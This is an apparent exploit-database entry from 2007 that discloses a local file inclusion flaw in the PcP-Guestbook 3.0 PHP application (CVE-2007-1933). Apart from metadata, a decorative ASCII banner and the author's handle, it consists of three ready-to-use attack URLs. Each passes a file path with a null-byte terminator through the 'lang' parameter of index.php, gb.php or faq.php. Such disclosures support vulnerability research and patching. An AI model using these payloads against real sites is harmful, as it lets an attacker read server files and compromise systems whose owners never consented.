[] NeoSense

PcP-Guestbook 3.0 - 'lang' Local File Inclusion

Author: Dj7xpl
type: webapps
platform: php
port: 
date_added: 2007-04-07 
date_updated:  
verified: 1 
codes: OSVDB-38461;CVE-2007-1933;OSVDB-38460;OSVDB-38459 
tags: 
aliases:  
screenshot_url:  
application_url: 

                                                          .-""""""""-.
                                                         /   Dj7xpl   \
                                                        |              |
                                                        |,  .-.  .-.  ,|
                                                        | )(_o/  \o_)( |
                                                        |/     /\     \|
                                              (@_       (_     ^^     _)
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          /
                                               (@

+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
*       [~] Portal.......:    PcP-Book 3.0
*	[~] Site.........:    http://www.pcp-system.at
*       [~] Down.........:    http://www.ectona.org/download/?id=621&s=info
*	[~] Author.......:    Dj7xpl  | Dj7xpl@yahoo.com
*
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*
*       [~] Vuln.........:         http://[Target]/[Path]/index.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/gb.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/faq.php?lang=[File-To-Require]%00
*
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-04-08]